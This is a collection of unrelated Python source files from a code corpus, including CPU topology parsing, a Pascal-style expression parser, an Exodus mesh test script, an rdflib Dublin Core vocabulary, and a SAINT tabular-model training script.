# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from . import proc
from collections import OrderedDict
import json
import logging
import os
import subprocess
ENV_LSCPU_SYSFS = "CMK_DEV_LSCPU_SYSFS"
# Returns a dictionary of socket_id (int) to intel.topology.Socket.
def discover():
isol = isolcpus()
if isol:
logging.info("Isolated logical cores: {}".format(
",".join([str(c) for c in isol])))
return parse(lscpu(), isol)
class Socket:
def __init__(self, socket_id, cores=None):
if not cores:
cores = {}
self.socket_id = socket_id
self.cores = OrderedDict(
sorted(cores.items(), key=lambda pair: pair[1].core_id))
def as_dict(self, include_pool=True):
return {
"id": self.socket_id,
"cores": [c.as_dict(include_pool) for c in self.cores.values()]
}
def json(self):
return json.dumps(self.as_dict(), indent=2, sort_keys=True)
class Core:
def __init__(self, core_id, cpus=None):
if not cpus:
cpus = {}
self.core_id = core_id
self.pool = None
self.cpus = OrderedDict(
sorted(cpus.items(), key=lambda pair: pair[1].cpu_id))
def cpu_ids(self):
return list(self.cpus.keys())
def is_isolated(self):
if len(self.cpus) == 0:
return False
for cpu_id in self.cpus:
if not self.cpus[cpu_id].isolated:
return False
return True
def as_dict(self, include_pool=True):
result = {
"id": self.core_id,
"cpus": [c.as_dict() for c in self.cpus.values()]
}
if include_pool:
result["pool"] = self.pool
return result
class CPU:
def __init__(self, cpu_id):
self.cpu_id = cpu_id
self.isolated = False
def as_dict(self):
return {
"id": self.cpu_id,
"isolated": self.isolated,
}
# Returns of map of socket id (integer) to sockets (Socket type).
# lscpu has the following format:
# # The following is the parsable format, which can be fed to other
# # programs. Each different item in every column has an unique ID
# # starting from zero.
# # CPU,Core,Socket,Node,,L1d,L1i,L2,L3
# 0,0,0,0,,0,0,0,0
# 1,1,0,0,,1,1,1,0
def parse(lscpu_output, isolated_cpus=None):
if not isolated_cpus:
isolated_cpus = []
sockets = {}
for line in lscpu_output.split("\n"):
if line and not line.startswith("#"):
cpuinfo = line.split(",")
socket_id = int(cpuinfo[2])
core_id = int(cpuinfo[1])
cpu_id = int(cpuinfo[0])
if socket_id not in sockets:
sockets[socket_id] = Socket(socket_id)
socket = sockets[socket_id]
if core_id not in socket.cores:
socket.cores[core_id] = Core(core_id)
core = socket.cores[core_id]
cpu = CPU(cpu_id)
if cpu.cpu_id in isolated_cpus:
cpu.isolated = True
core.cpus[cpu_id] = cpu
return sockets
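# Worked example (added for clarity): given the two data lines
#   0,0,0,0,,0,0,0,0
#   1,0,0,0,,0,0,0,0
# parse(lscpu_output, isolated_cpus=[1]) returns {0: Socket(0)} holding Core(0) with
# CPU 0 (isolated=False) and CPU 1 (isolated=True), i.e. both hyperthreads of that core.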
def lscpu():
sys_fs_path = os.getenv(ENV_LSCPU_SYSFS)
if sys_fs_path is None:
cmd_out = subprocess.check_output("lscpu -p", shell=True)
else:
cmd_out = subprocess.check_output(
"lscpu -p -s %s" % sys_fs_path, shell=True)
return cmd_out.decode("UTF-8")
def isolcpus():
with open(os.path.join(proc.procfs(), "cmdline")) as f:
return parse_isolcpus(f.read())
# Returns list of isolated cpu ids from /proc/cmdline content.
def parse_isolcpus(cmdline):
cpus = []
# Ensure that newlines are removed.
cmdline_stripped = cmdline.rstrip()
cmdline_fields = cmdline_stripped.split()
for cmdline_field in cmdline_fields:
pair = cmdline_field.split("=")
if len(pair) != 2:
continue
key = pair[0]
value = pair[1]
if key == "isolcpus":
cpus_str = value.split(",")
for cpu_id in cpus_str:
cpus.append(int(cpu_id))
return cpus
|
StarcoderdataPython
|
1712989
|
<filename>src/modelpath.py
from functools import reduce
import re
class ModelPath:
R = re.compile(r"[\/\\]")
EXTENSION = ".mdl"
def __init__(self, key):
self.key = key
self.models = []
self.subpaths = {}
def addSubPath(self,subdir):
self.subpaths[subdir.key] = subdir
def addModel(self,path,split=None):
if split is None:
split = ModelPath.R.split(path)
if len(split) == 1:
if not path in self.models:
self.models.append(path)
else:
if not split[0] in self:
childPath = ModelPath(split[0])
self.addSubPath(childPath)
else:
childPath = self.getSubPath(split[0])
childPath.addModel(path,split=split[1:])
def getSubPath(self,key):
return self.subpaths[key]
def removeModel(self,model):
self.models.remove(model)
def popModel(self,index):
return self.models.pop(index)
def __len__(self):
length = len(self.models)
        for path in self.subpaths.values():
length += len(path)
return length
def __as_string(self,tabs = 0):
newtabs = tabs + 1
s = "".join(["\t" for i in range(tabs)])
s += "\"" + self.key + "\" {"
if len(self.models) > 0:
s += "\n"
s += "".join(["\t" for i in range(newtabs)])
s += str(self.models) + "\n"
if len(self.subpaths) > 0:
s += "\n"
s += "".join(["\t" for i in range(newtabs)])
for key in self.subpaths:
sub = self.subpaths[key]
s += sub.__as_string(newtabs)
s += "".join(["\t" for i in range(tabs)])
s += "}\n"
return s
def __str__(self):
return self.__as_string()
def __contains__(self,key):
if key.endswith(ModelPath.EXTENSION):
return key in self.models
else:
return key in self.subpaths
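# Illustrative usage sketch (added): the model paths below are invented examples.
if __name__ == "__main__":
    root = ModelPath("models")
    root.addModel("props/crate.mdl")
    root.addModel("props/barrel.mdl")
    root.addModel("weapons/pistol.mdl")
    print(len(root))        # 3: models are counted recursively through the sub-paths
    print("props" in root)  # True: non-.mdl keys are looked up among the sub-paths
    print(root)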
|
StarcoderdataPython
|
1609502
|
<gh_stars>0
import pathlib
import subprocess
import pytest
official_examples = [
(
"tutorials/mnist_pytorch",
"tutorials/mnist_pytorch/const.yaml",
),
(
"tutorials/fashion_mnist_tf_keras",
"tutorials/fashion_mnist_tf_keras/const.yaml",
),
(
"tutorials/imagenet_pytorch",
"tutorials/imagenet_pytorch/const_cifar.yaml",
),
(
"computer_vision/cifar10_pytorch",
"computer_vision/cifar10_pytorch/const.yaml",
),
(
"computer_vision/mnist_estimator",
"computer_vision/mnist_estimator/const.yaml",
),
(
"computer_vision/mnist_tf_layers",
"computer_vision/mnist_tf_layers/const.yaml",
),
(
"computer_vision/cifar10_tf_keras",
"computer_vision/cifar10_tf_keras/const.yaml",
),
(
"computer_vision/iris_tf_keras",
"computer_vision/iris_tf_keras/const.yaml",
),
(
"gan/gan_mnist_pytorch",
"gan/gan_mnist_pytorch/const.yaml",
),
(
"gan/dcgan_tf_keras",
"gan/dcgan_tf_keras/const.yaml",
),
(
"gan/pix2pix_tf_keras",
"gan/pix2pix_tf_keras/const.yaml",
),
(
"decision_trees/gbt_titanic_estimator",
"decision_trees/gbt_titanic_estimator/const.yaml",
),
(
"features/custom_reducers_mnist_pytorch",
"features/custom_reducers_mnist_pytorch/const.yaml",
),
]
@pytest.mark.parametrize("model_def,config_file", official_examples)
def test_official(model_def: str, config_file: str) -> None:
examples_dir = pathlib.Path(__file__).parent.parent
model_def_absolute = examples_dir.joinpath(model_def)
config_file_absolute = examples_dir.joinpath(config_file)
startup_hook = model_def_absolute.joinpath("startup-hook.sh")
if startup_hook.exists():
subprocess.check_output(("sh", str(startup_hook)))
subprocess.check_output(
(
"det",
"experiment",
"create",
"--local",
"--test",
str(config_file_absolute),
str(model_def_absolute),
)
)
|
StarcoderdataPython
|
1782962
|
from . import astree
from .lexer import Lexer
from . import tok
# rules:
# factor: INTEGER | variable
# value: factor | paren | (PLUS | MINUS) value
# paren: LPAREN expr RPAREN
# power: value (POW value)*
# mul: power ((MUL | DIV) power)*
# addition: mul ((PLUS | MINUS) mul)*
# expr: additon
# pascal rules
# program: compound_block DOT
# compound_block = BEGIN block END
# block: statements | statements SEMI block
# statements: empty | assignment | compound_block
# assignment: variable ASSIGN expr
# variable: id
# empty:
# expr: see above
class Interpreter:
def __init__(self, lexer: Lexer):
self.lexer = lexer
# set current token to the first token taken from the input
self.current_token = self.lexer.get_next_token()
def error(self):
raise Exception('Invalid syntax')
def eat(self, token_type):
# compare the current token type with the passed token
# type and if they match then "eat" the current token
# and assign the next token to the self.current_token,
# otherwise raise an exception.
print('current token: ', self.current_token, ' required token: ', token_type)
if self.current_token.type == token_type:
self.current_token = self.lexer.get_next_token()
else:
self.error()
def integer(self) -> astree.AST:
"""Return an INTEGER token value.
factor : INTEGER
"""
token = self.current_token
self.eat(tok.INTEGER)
return astree.Num(token)
def variable(self) -> astree.AST:
token = self.current_token
self.eat(tok.VAR)
return astree.Variable(token)
def assignment(self) -> astree.AST:
"""Return an assignment AST
assignment: variable ASSIGN expr
"""
var = self.variable()
self.eat(tok.ASSIGN)
expr = self.expr()
return astree.Assign(var, expr)
def value(self) -> astree.AST:
"""value parser / interpreter.
value: factor | paren
"""
if self.current_token.type == tok.INTEGER:
return self.integer()
if self.current_token.type == tok.VAR:
return self.variable()
if self.current_token.type == tok.LPAREN:
return self.paren()
if self.current_token.type == tok.PLUS:
self.eat(tok.PLUS)
return astree.UnaryOp_PLUS(self.value())
        if self.current_token.type == tok.MINUS:
            self.eat(tok.MINUS)
            return astree.UnaryOp_MINUS(self.value())
        # no rule matched: report a syntax error instead of silently returning None
        self.error()
def paren(self) -> astree.AST:
"""Parenthesis parser / interpreter.
paren: LPAREN term1 RPAREN
term1: addition
"""
self.eat(tok.LPAREN)
result = self.addition()
self.eat(tok.RPAREN)
return result
def power(self) -> astree.AST:
"""Power parser / interpreter
power: value (POW value)*
"""
result = self.value()
while self.current_token.type == tok.POW:
self.eat(tok.POW)
result = astree.BinOp_POW(result, self.value())
return result
def mul(self) -> astree.AST:
"""Arithmetic expression parser / interpreter.
mul: value ((MUL | DIV) value)*
"""
result = self.power()
while self.current_token.type in (tok.MUL, tok.DIV):
token = self.current_token
if token.type == tok.MUL:
self.eat(tok.MUL)
result = astree.BinOp_MUL(result, self.power())
elif token.type == tok.DIV:
self.eat(tok.DIV)
result = astree.BinOp_DIV(result, self.power())
return result
def addition(self) -> astree.AST:
"""Arithmetic expression parser / interpreter.
addition: mul ((PLUS | MINUS) mul)*
"""
result = self.mul()
while self.current_token.type in (tok.PLUS, tok.MINUS):
token = self.current_token
if token.type == tok.PLUS:
self.eat(tok.PLUS)
result = astree.BinOp_PLUS(result, self.mul())
elif token.type == tok.MINUS:
self.eat(tok.MINUS)
result = astree.BinOp_MINUS(result, self.mul())
return result
def expr(self) -> astree.AST:
result = self.addition()
return result
def program(self) -> astree.AST:
result = self.compound_block()
self.eat(tok.DOT)
self.eat(tok.EOF)
return result
def compound_block(self) -> astree.AST:
self.eat(tok.BEG)
result = self.block()
self.eat(tok.END)
return result
def block(self) -> astree.AST:
result = self.statements()
while self.current_token.type == tok.SEMI:
self.eat(tok.SEMI)
next = self.statements()
result = astree.Sequence(result, next)
return result
def statements(self) -> astree.AST:
if self.current_token.type == tok.BEG:
return self.compound_block()
if self.current_token.type == tok.VAR:
return self.assignment()
else:
return self.empty()
def empty(self) -> astree.AST:
return astree.Empty()
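# Illustrative driver sketch (added; assumes Lexer is constructed from the raw source text):
#   Interpreter(Lexer('BEGIN x := 1 + 2 * 3 END.')).program()
# parses the program above into an Assign AST (chained statements would be wrapped in
# Sequence nodes), with the expression subtree following the precedence listed in the
# grammar comments at the top of this module.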
|
StarcoderdataPython
|
1742679
|
<gh_stars>0
#!/usr/bin/env python
"""
Test routine for SEACAS exodus.py module
"""
import exodus
DATABASE_PATH = "baseline.g"
# Test outputing c-type arrays and numpy arrays
ARRAY_TYPES = ['ctype', 'numpy']
for array_type in ARRAY_TYPES:
EXO = exodus.exodus(DATABASE_PATH, array_type=array_type)
print("Exodus file has title:", EXO.title())
print("Exodus file has", EXO.num_dimensions(), "dimensions")
print("Exodus file has", EXO.num_nodes(), "nodes")
print("Exodus file has", EXO.num_elems(), "elements")
print("Exodus file has", EXO.num_blks(), "blocks")
print("Exodus file has", EXO.num_node_sets(), "node sets")
print("Exodus file has", EXO.num_side_sets(), "side sets")
print("Exodus file has", EXO.num_times(), "time steps")
if EXO.num_times() > 0:
TIMES = EXO.get_times()
for time in TIMES:
print("time = ", time)
BLOCKS = EXO.get_elem_blk_ids()
for block in BLOCKS:
name = EXO.get_elem_blk_name(block)
print("block id = {}, name = {}".format(block, name))
SIDESETS = EXO.get_side_set_ids()
for sideset in SIDESETS:
print("side set id = ", sideset)
NODESETS = EXO.get_node_set_ids()
for nodeset in NODESETS:
print("node set id = ", nodeset)
COORDINATES = EXO.get_coords()
print("Local Node Id 1 has COORDINATES: {} {} {}"
.format(COORDINATES[0][0], COORDINATES[1][0], COORDINATES[2][0]))
NN = (EXO.num_nodes() - 1)
print("Local Node Id {} has COORDINATES: {} {} {}"
.format(EXO.num_nodes(), COORDINATES[0][NN], COORDINATES[1][NN], COORDINATES[2][NN]))
print("Side Set Variable Names")
SSVARNAMES = EXO.get_side_set_variable_names()
for name in SSVARNAMES:
print("ssvar = ", name)
print("Side Set Cosa Variable Values")
step = 1
if EXO.num_times() > 0:
for time in TIMES:
print("time = ", time)
ssvals = EXO.get_side_set_variable_values(1, "cosa", step)
for ssval in ssvals:
print("value =", ssval)
step += 1
EXO.close()
# Test reading in data from exodus database, and then copying it into another database
for array_type in ARRAY_TYPES:
new_DATABASE_PATH = DATABASE_PATH[:-2] + '_' + array_type + '_copy.e'
exodus.copyTransfer(DATABASE_PATH, new_DATABASE_PATH, array_type=array_type)
print("Database copied using " + array_type + " arrays.")
# Test the exodus.py `copy` function which calls the C API `ex_copy`
DB_PATH = "base_ioshell.g"
EXO = exodus.exodus(DB_PATH)
NEW_DATABASE_PATH = DB_PATH[:-2] + '_copy.e'
EXO_COPY = EXO.copy(NEW_DATABASE_PATH, True)
EXO_COPY.summarize()
print("Exodus file has", EXO_COPY.num_blks(), "blocks")
BLOCKS = EXO_COPY.get_elem_blk_ids()
for block in BLOCKS:
name = EXO_COPY.get_elem_blk_name(block)
print("\tblock id = {}, name = {}".format(block, name))
print("Exodus file has", EXO_COPY.num_side_sets(), "side sets")
SIDESETS = EXO_COPY.get_side_set_ids()
for sideset in SIDESETS:
name = EXO_COPY.get_side_set_name(sideset)
print("\tside set id = {}, name = {}".format(sideset, name))
print("Exodus file has", EXO_COPY.num_node_sets(), "node sets")
NODESETS = EXO_COPY.get_node_set_ids()
for nodeset in NODESETS:
name = EXO_COPY.get_node_set_name(nodeset)
print("\tnode set id = {}, name = {}".format(nodeset, name))
COORDINATES = EXO_COPY.get_coords()
print("Local Node Id 1 has COORDINATES: {} {} {}"
.format(COORDINATES[0][0], COORDINATES[1][0], COORDINATES[2][0]))
NN = (EXO_COPY.num_nodes() - 1)
print("Local Node Id {} has COORDINATES: {} {} {}"
.format(EXO_COPY.num_nodes(), COORDINATES[0][NN], COORDINATES[1][NN], COORDINATES[2][NN]))
print("Exodus file has", EXO_COPY.num_times(), "time steps")
if EXO_COPY.num_times() > 0:
TIMES = EXO_COPY.get_times()
for time in TIMES:
print("\ttime = ", time)
SSVARNAMES = EXO_COPY.get_side_set_variable_names()
print("Side Set Variable Names:")
for name in SSVARNAMES:
print("\tSideSet Variable = ", name)
step = 2
ssvals = EXO_COPY.get_side_set_variable_values(2, "SideBlock_2", step)
EXO_COPY.close()
|
StarcoderdataPython
|
1642021
|
from rdflib.term import URIRef
from rdflib.namespace import DefinedNamespace, Namespace
class DCTERMS(DefinedNamespace):
"""
DCMI Metadata Terms - other
Generated from: https://www.dublincore.org/specifications/dublin-core/dcmi-terms/dublin_core_terms.ttl
Date: 2020-05-26 14:20:00.590514
"""
_fail = True
# http://purl.org/dc/dcam/VocabularyEncodingScheme
DCMIType: URIRef # The set of classes specified by the DCMI Type Vocabulary, used to categorize the nature or genre of the resource.
DDC: URIRef # The set of conceptual resources specified by the Dewey Decimal Classification.
IMT: URIRef # The set of media types specified by the Internet Assigned Numbers Authority.
LCC: URIRef # The set of conceptual resources specified by the Library of Congress Classification.
LCSH: URIRef # The set of labeled concepts specified by the Library of Congress Subject Headings.
MESH: URIRef # The set of labeled concepts specified by the Medical Subject Headings.
NLM: URIRef # The set of conceptual resources specified by the National Library of Medicine Classification.
TGN: URIRef # The set of places specified by the Getty Thesaurus of Geographic Names.
UDC: URIRef # The set of conceptual resources specified by the Universal Decimal Classification.
# http://www.w3.org/1999/02/22-rdf-syntax-ns#Property
abstract: URIRef # A summary of the resource.
accessRights: URIRef # Information about who access the resource or an indication of its security status.
accrualMethod: URIRef # The method by which items are added to a collection.
accrualPeriodicity: URIRef # The frequency with which items are added to a collection.
accrualPolicy: URIRef # The policy governing the addition of items to a collection.
alternative: URIRef # An alternative name for the resource.
audience: URIRef # A class of agents for whom the resource is intended or useful.
available: URIRef # Date that the resource became or will become available.
bibliographicCitation: URIRef # A bibliographic reference for the resource.
conformsTo: URIRef # An established standard to which the described resource conforms.
contributor: URIRef # An entity responsible for making contributions to the resource.
coverage: URIRef # The spatial or temporal topic of the resource, spatial applicability of the resource, or jurisdiction under which the resource is relevant.
created: URIRef # Date of creation of the resource.
creator: URIRef # An entity responsible for making the resource.
date: URIRef # A point or period of time associated with an event in the lifecycle of the resource.
dateAccepted: URIRef # Date of acceptance of the resource.
dateCopyrighted: URIRef # Date of copyright of the resource.
dateSubmitted: URIRef # Date of submission of the resource.
description: URIRef # An account of the resource.
educationLevel: URIRef # A class of agents, defined in terms of progression through an educational or training context, for which the described resource is intended.
extent: URIRef # The size or duration of the resource.
format: URIRef # The file format, physical medium, or dimensions of the resource.
hasFormat: URIRef # A related resource that is substantially the same as the pre-existing described resource, but in another format.
hasPart: URIRef # A related resource that is included either physically or logically in the described resource.
hasVersion: URIRef # A related resource that is a version, edition, or adaptation of the described resource.
identifier: URIRef # An unambiguous reference to the resource within a given context.
instructionalMethod: URIRef # A process, used to engender knowledge, attitudes and skills, that the described resource is designed to support.
isFormatOf: URIRef # A pre-existing related resource that is substantially the same as the described resource, but in another format.
isPartOf: URIRef # A related resource in which the described resource is physically or logically included.
isReferencedBy: URIRef # A related resource that references, cites, or otherwise points to the described resource.
isReplacedBy: URIRef # A related resource that supplants, displaces, or supersedes the described resource.
isRequiredBy: URIRef # A related resource that requires the described resource to support its function, delivery, or coherence.
isVersionOf: URIRef # A related resource of which the described resource is a version, edition, or adaptation.
issued: URIRef # Date of formal issuance of the resource.
language: URIRef # A language of the resource.
license: URIRef # A legal document giving official permission to do something with the resource.
mediator: URIRef # An entity that mediates access to the resource.
medium: URIRef # The material or physical carrier of the resource.
modified: URIRef # Date on which the resource was changed.
provenance: URIRef # A statement of any changes in ownership and custody of the resource since its creation that are significant for its authenticity, integrity, and interpretation.
publisher: URIRef # An entity responsible for making the resource available.
references: URIRef # A related resource that is referenced, cited, or otherwise pointed to by the described resource.
relation: URIRef # A related resource.
replaces: URIRef # A related resource that is supplanted, displaced, or superseded by the described resource.
requires: URIRef # A related resource that is required by the described resource to support its function, delivery, or coherence.
rights: URIRef # Information about rights held in and over the resource.
rightsHolder: URIRef # A person or organization owning or managing rights over the resource.
source: URIRef # A related resource from which the described resource is derived.
spatial: URIRef # Spatial characteristics of the resource.
subject: URIRef # A topic of the resource.
tableOfContents: URIRef # A list of subunits of the resource.
temporal: URIRef # Temporal characteristics of the resource.
title: URIRef # A name given to the resource.
type: URIRef # The nature or genre of the resource.
valid: URIRef # Date (often a range) of validity of a resource.
# http://www.w3.org/2000/01/rdf-schema#Class
Agent: URIRef # A resource that acts or has the power to act.
AgentClass: URIRef # A group of agents.
BibliographicResource: URIRef # A book, article, or other documentary resource.
FileFormat: URIRef # A digital resource format.
Frequency: URIRef # A rate at which something recurs.
Jurisdiction: URIRef # The extent or range of judicial, law enforcement, or other authority.
LicenseDocument: URIRef # A legal document giving official permission to do something with a resource.
LinguisticSystem: URIRef # A system of signs, symbols, sounds, gestures, or rules used in communication.
Location: URIRef # A spatial region or named place.
LocationPeriodOrJurisdiction: URIRef # A location, period of time, or jurisdiction.
MediaType: URIRef # A file format or physical medium.
MediaTypeOrExtent: URIRef # A media type or extent.
MethodOfAccrual: URIRef # A method by which resources are added to a collection.
MethodOfInstruction: URIRef # A process that is used to engender knowledge, attitudes, and skills.
PeriodOfTime: URIRef # An interval of time that is named or defined by its start and end dates.
PhysicalMedium: URIRef # A physical material or carrier.
PhysicalResource: URIRef # A material thing.
Policy: URIRef # A plan or course of action by an authority, intended to influence and determine decisions, actions, and other matters.
ProvenanceStatement: URIRef # Any changes in ownership and custody of a resource since its creation that are significant for its authenticity, integrity, and interpretation.
RightsStatement: URIRef # A statement about the intellectual property rights (IPR) held in or over a resource, a legal document giving official permission to do something with a resource, or a statement about access rights.
SizeOrDuration: URIRef # A dimension or extent, or a time taken to play or execute.
Standard: URIRef # A reference point against which other things can be evaluated or compared.
# http://www.w3.org/2000/01/rdf-schema#Datatype
Box: URIRef # The set of regions in space defined by their geographic coordinates according to the DCMI Box Encoding Scheme.
ISO3166: URIRef # The set of codes listed in ISO 3166-1 for the representation of names of countries.
Period: URIRef # The set of time intervals defined by their limits according to the DCMI Period Encoding Scheme.
Point: URIRef # The set of points in space defined by their geographic coordinates according to the DCMI Point Encoding Scheme.
RFC1766: URIRef # The set of tags, constructed according to RFC 1766, for the identification of languages.
RFC3066: URIRef # The set of tags constructed according to RFC 3066 for the identification of languages.
RFC4646: URIRef # The set of tags constructed according to RFC 4646 for the identification of languages.
RFC5646: URIRef # The set of tags constructed according to RFC 5646 for the identification of languages.
URI: URIRef # The set of identifiers constructed according to the generic syntax for Uniform Resource Identifiers as specified by the Internet Engineering Task Force.
W3CDTF: URIRef # The set of dates and times constructed according to the W3C Date and Time Formats Specification.
# Valid non-python identifiers
_extras = ['ISO639-2', 'ISO639-3']
_NS = Namespace("http://purl.org/dc/terms/")
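# A hedged usage sketch (added; it assumes this class is exposed as an rdflib
# DefinedNamespace for Dublin Core terms, referred to below as DCTERMS):
#
#   from rdflib import Graph, Literal, URIRef
#
#   g = Graph()
#   doc = URIRef("http://example.org/report/1")
#   g.add((doc, DCTERMS.title, Literal("Quarterly report")))
#   g.add((doc, DCTERMS.issued, Literal("2021-03-01")))
#   # each attribute resolves against _NS, e.g.
#   # str(DCTERMS.title) == "http://purl.org/dc/terms/title"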
|
StarcoderdataPython
|
1653502
|
<reponame>ralbuyeh-figure/saint
import torch
from torch import nn
from models import SAINT
from data_openml import data_prep_openml,task_dset_ids,DataSetCatCon
import argparse
from torch.utils.data import DataLoader
import torch.optim as optim
from utils import count_parameters, classification_scores, mean_sq_error
from augmentations import embed_data_mask
from augmentations import add_noise
import os
import numpy as np
class FakeParser:
pass
# Driver's code
opt = FakeParser()
opt.dset_id = 1461
opt.task = "binary"
opt.attentiontype = "colrow"
opt.cont_embeddings = "MLP"
opt.vision_dset = False
opt.embedding_size = 32
opt.transformer_depth = 6
opt.attention_heads = 8
opt.attention_dropout = 0.1
opt.ff_dropout = 0.1
opt.attentiontype = "colrow"
opt.optimizer = "AdamW"
#parser = argparse.ArgumentParser()
#parser.add_argument('--dset_id', required=True, type=int)
#parser.add_argument('--vision_dset', action = 'store_true')
#parser.add_argument('--task', required=True, type=str,choices = ['binary','multiclass','regression'])
#parser.add_argument('--cont_embeddings', default='MLP', type=str,choices = ['MLP','Noemb','pos_singleMLP'])
#parser.add_argument('--embedding_size', default=32, type=int)
#parser.add_argument('--transformer_depth', default=6, type=int)
#parser.add_argument('--attention_heads', default=8, type=int)
#parser.add_argument('--attention_dropout', default=0.1, type=float)
#parser.add_argument('--ff_dropout', default=0.1, type=float)
#parser.add_argument('--attentiontype', default='colrow', type=str,choices = ['col','colrow','row','justmlp','attn','attnmlp'])
#parser.add_argument('--optimizer', default='AdamW', type=str,choices = ['AdamW','Adam','SGD'])
opt.scheduler = "cosine"
#parser.add_argument('--scheduler', default='cosine', type=str,choices = ['cosine','linear'])
opt.lr = 0.0001
#parser.add_argument('--lr', default=0.0001, type=float)
opt.epochs = 100
#parser.add_argument('--epochs', default=100, type=int)
opt.batchsize = 256
#parser.add_argument('--batchsize', default=256, type=int)
opt.savemodelroot = "./bestmodels"
#parser.add_argument('--savemodelroot', default='./bestmodels', type=str)
opt.run_name = "testrun"
#parser.add_argument('--run_name', default='testrun', type=str)
opt.set_seed = 1
#parser.add_argument('--set_seed', default= 1 , type=int)
opt.dset_seed = 5
#parser.add_argument('--dset_seed', default= 5 , type=int)
opt.active_log = True
#parser.add_argument('--active_log', action = 'store_true')
opt.pretrain = True
#parser.add_argument('--pretrain', action = 'store_true')
opt.pretrain_epochs = 50
#parser.add_argument('--pretrain_epochs', default=50, type=int)
opt.pt_tasks = ["contrastive", "denoising"]
#parser.add_argument('--pt_tasks', default=['contrastive','denoising'], type=str,nargs='*',choices = ['contrastive','contrastive_sim','denoising'])
opt.pt_aug = []
#parser.add_argument('--pt_aug', default=[], type=str,nargs='*',choices = ['mixup','cutmix'])
opt.pt_aug_lam = 0.1
#parser.add_argument('--pt_aug_lam', default=0.1, type=float)
opt.mixup_lam = 0.3
#parser.add_argument('--mixup_lam', default=0.3, type=float)
opt.train_mask_prob = 0
#parser.add_argument('--train_mask_prob', default=0, type=float)
opt.mask_prob = 0
#parser.add_argument('--mask_prob', default=0, type=float)
opt.ssl_avail_y = 0
#parser.add_argument('--ssl_avail_y', default= 0, type=int)
opt.pt_projhead_style = "diff"
#parser.add_argument('--pt_projhead_style', default='diff', type=str,choices = ['diff','same','nohead'])
opt.nce_temp = 0.7
#parser.add_argument('--nce_temp', default=0.7, type=float)
opt.lam0 = 0.5
opt.lam1 = 10
opt.lam2 = 1
opt.lam3 = 10
opt.final_mlp_style = "sep"
#parser.add_argument('--lam0', default=0.5, type=float)
#parser.add_argument('--lam1', default=10, type=float)
#parser.add_argument('--lam2', default=1, type=float)
#parser.add_argument('--lam3', default=10, type=float)
#parser.add_argument('--final_mlp_style', default='sep', type=str,choices = ['common','sep'])
#opt = parser.parse_args()
modelsave_path = os.path.join(os.getcwd(),opt.savemodelroot,opt.task,str(opt.dset_id),opt.run_name)
if opt.task == 'regression':
opt.dtask = 'reg'
else:
opt.dtask = 'clf'
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
print(f"Device is {device}.")
torch.manual_seed(opt.set_seed)
os.makedirs(modelsave_path, exist_ok=True)
if opt.active_log:
import wandb
if opt.pretrain:
wandb.init(project="saint_v2_all", group =opt.run_name ,name = f'pretrain_{opt.task}_{str(opt.attentiontype)}_{str(opt.dset_id)}_{str(opt.set_seed)}')
else:
if opt.task=='multiclass':
wandb.init(project="saint_v2_all_kamal", group =opt.run_name ,name = f'{opt.task}_{str(opt.attentiontype)}_{str(opt.dset_id)}_{str(opt.set_seed)}')
else:
wandb.init(project="saint_v2_all", group =opt.run_name ,name = f'{opt.task}_{str(opt.attentiontype)}_{str(opt.dset_id)}_{str(opt.set_seed)}')
#### gutting the data preprocessing
import openml
import numpy as np
from sklearn.preprocessing import LabelEncoder
import pandas as pd
from torch.utils.data import Dataset
ds_id = opt.dset_id
seed = opt.dset_seed
task = opt.task
datasplit=[.65, .15, .2]
np.random.seed(seed)
dataset = openml.datasets.get_dataset(ds_id)
X, y, categorical_indicator, attribute_names = dataset.get_data(dataset_format="dataframe",
target=dataset.default_target_attribute)
# X is a pandas dataframe with a bunch of features, a mix of categorical and continuous/float columns
# y is a pandas series with distinct categories, '1' and '2'
# categorical indicator is a list of booleans where the value corresponds to the column index
# attribute names is like above but with names in place of boolean
if ds_id == 42178:
categorical_indicator = [True, False, True, True, False, True, True, True, True, True, True, True, True, True, True,
True, True, False, False]
tmp = [x if (x != ' ') else '0' for x in X['TotalCharges'].tolist()]
X['TotalCharges'] = [float(i) for i in tmp]
y = y[X.TotalCharges != 0]
X = X[X.TotalCharges != 0]
X.reset_index(drop=True, inplace=True)
print(y.shape, X.shape)
if ds_id in [42728, 42705, 42729, 42571]:
# import ipdb; ipdb.set_trace()
X, y = X[:50000], y[:50000]
X.reset_index(drop=True, inplace=True)
categorical_columns = X.columns[list(np.where(np.array(categorical_indicator) == True)[0])].tolist()
# this just specifies the categorical column names
cont_columns = list(set(X.columns.tolist()) - set(categorical_columns))
# these are the continuous columns, i.e. the feature names left after removing the categorical columns
cat_idxs = list(np.where(np.array(categorical_indicator) == True)[0])
# indexes of categorical columns.. for some reason
con_idxs = list(set(range(len(X.columns))) - set(cat_idxs))
# indexes of continuous columns
for col in categorical_columns:
X[col] = X[col].astype("object")
# converting all the categoricals to type object
X["Set"] = np.random.choice(["train", "valid", "test"], p=datasplit, size=(X.shape[0],))
# apply train test val flag
train_indices = X[X.Set == "train"].index
valid_indices = X[X.Set == "valid"].index
test_indices = X[X.Set == "test"].index
# int64 index of the corresponding indices to flag
X = X.drop(columns=['Set'])
# drop that flag column
temp = X.fillna("MissingValue")
# fill NaNs with the placeholder string "MissingValue"
nan_mask = temp.ne("MissingValue").astype(int)
# returns a dataframe of 1s where value is not missing value... so mostly a matrix of 1s.
cat_dims = []
for col in categorical_columns:
# X[col] = X[col].cat.add_categories("MissingValue")
X[col] = X[col].fillna("MissingValue")
l_enc = LabelEncoder()
X[col] = l_enc.fit_transform(X[col].values)
cat_dims.append(len(l_enc.classes_))
# apply arbitrary integer values to categorical columns...
# cat dims is the number of distinct categories for each categorical column
# watch out here, they're not really being mindful of leakage.
for col in cont_columns:
# X[col].fillna("MissingValue",inplace=True)
X.fillna(X.loc[train_indices, col].mean(), inplace=True)
# mean impute the continuous columns... that's bad because i don't see them doing any of that using the training params
# on the val and test, we'll see
y = y.values
if task != 'regression':
l_enc = LabelEncoder()
y = l_enc.fit_transform(y)
# label encoding the y vector to be 0s and 1s..
def data_split(X, y, nan_mask, indices):
x_d = {
'data': X.values[indices],
'mask': nan_mask.values[indices]
}
if x_d['data'].shape != x_d['mask'].shape:
raise ValueError('Shape of data not same as that of nan mask!')
y_d = {
'data': y[indices].reshape(-1, 1)
}
return x_d, y_d
